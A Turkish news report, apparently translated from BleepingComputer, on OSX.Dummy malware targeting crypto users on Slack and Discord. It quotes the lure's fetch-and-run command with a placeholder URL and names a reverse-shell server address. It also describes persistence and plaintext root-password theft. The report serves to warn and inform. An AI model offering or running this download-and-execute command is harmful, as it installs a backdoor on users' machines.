1. Ana Sayfa
  2. Blockchain
  3. OSX.Dummy Mac Malware, Slack ve Discord Kanallarındaki Kripto Para Kullanıcılarını Hedefliyor

OSX.Dummy Mac Malware, Slack ve Discord Kanallarındaki Kripto Para Kullanıcılarını Hedefliyor

osx-dummy-malware

Güvenlik araştırmacıları, şu anda kripto para birimi odaklı Slack ve Discord kanallarında reklamı yapılan yeni bir Mac kötü amaçlı yazılım buldu.

Kötü amaçlı yazılımların varlığı geçen hafta ISC SANS işleyicisi ve DutchSec’in kurucusu olan Remco Verhoef tarafından keşfedildiğinde ortaya çıktı.

Verhoef, kripto para dünyasında yöneticiler, modlar ya da diğer önemli şahsiyetler gibi poz veren dolandırıcıların, Mac terminallerinde kullanıcıların uzun bir komut yazmaları için çeşitli sorunlarda yardımcı olduğunu söyleyen mesajlar yayınladığını belirtti.

Komut (aşağıya bakın) / tmp klasörüne “betik” adı verilen 34 MB’lık bir ikili dosyasını indirdi ve ardından root olarak çalıştırdı.

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Malware, virüs bulaşmış sistemlerde arka kapı oluşturuyor

“Komut dosyası” dosyası daha sonra işletim sistemi yeniden başlatmaları arasında kalıcılık elde etmek için bir başlatma programı olarak kendini ayarlar ve daha sonra 185.243.115.230:1337’de bulunan bir sunucuya bir ters kabuk açan bir Python betiği oluşturur.

Bu ters kabuğun amacı, saldırganın virüslü ana bilgisayarlara erişimini sağlamaktır.

“Kötü amaçlı yazılımların arkasındaki hacker (lar) ın, virüs bulaşmış makinelere erişim ile ilgili ne yapacağını tam olarak bilmiyoruz, ancak kripto para madenciliği topluluklarının hedeflendiği gerçeğini göz önünde bulundurarak, hırsızlık ile ilgilendikleri adil bir bahis kripto para, “Malwarebytes Mac’in kötü amaçlı yazılım uzmanı Thomas Reed, bu yeni kötü amaçlı yazılımı analiz eden üç güvenlik uzmanından biri.

Malware kurbanlarının root şifrelerini topluyor

Kötü amaçlı yazılımlara bakan başka bir Mac kötü amaçlı yazılım uzmanı olan Patrick Wardle, OSX.Dummy adını verdi. Kullanıcı adı Slack ve Discord kanallarında paylaşılan kodu çalıştırdığında, kötü amaçlı yazılım kullanıcının root şifresini istediği için onu adlandırdı.

Kötü amaçlı yazılımlar parolayı uzak bir sunucuya göndermez, ancak daha sonra diğer kötü amaçlı işlemlerde kullanılması muhtemel olan / Users / Shared / dumpdummy ve / tmp / dumpdummy dizinindeki bir dosyaya kaydeder .

Reed, kurbanın macOS root şifresinin şifresiz olarak kaydedilip şifrelenmediği için bunun tehlikeli bir operasyon olduğu konusunda uyardı.

Uzman kullanıcılar OSX.Dummy zararlı yazılımları kaldırsa bile, kullanıcının bulaşımı düzgün temizlemediği takdirde bu dosyanın devam edebileceğini savunur.

Reed, “Gelecekte kötü amaçlı yazılımlar, [OSX.Dummy] kötü amaçlı yazılım tarafından oluşturulan bu dosyaların konumlarını bulmak için ücretsiz olarak şifrelerinize erişebilecek şekilde tasarlanabilir” diyor.

Verhoef, Wardle ve Reed, kötü amaçlı yazılımın modus operandi’sinde son derece basit olduğunu söylüyor. Wardle, yarattığı birçok macOS güvenlik aracının bu tehdidi alacağını söylüyor.

Ancak, Malwarebytes blog gönderisinde Reed’in açıkladığı gibi, kullanıcılar o kadar dikkatsiz ve çalışan kodların tehlikelerinden habersizler, çevrimiçi bir forumdan kopyalanmışlarsa, büyük olasılıkla güvenlikle ilgili en iyi uygulamalarla ilgili hiçbir ipucu yoktur.

Kaynak : bleepingcomputer

Yorum Yap

Yorum Yap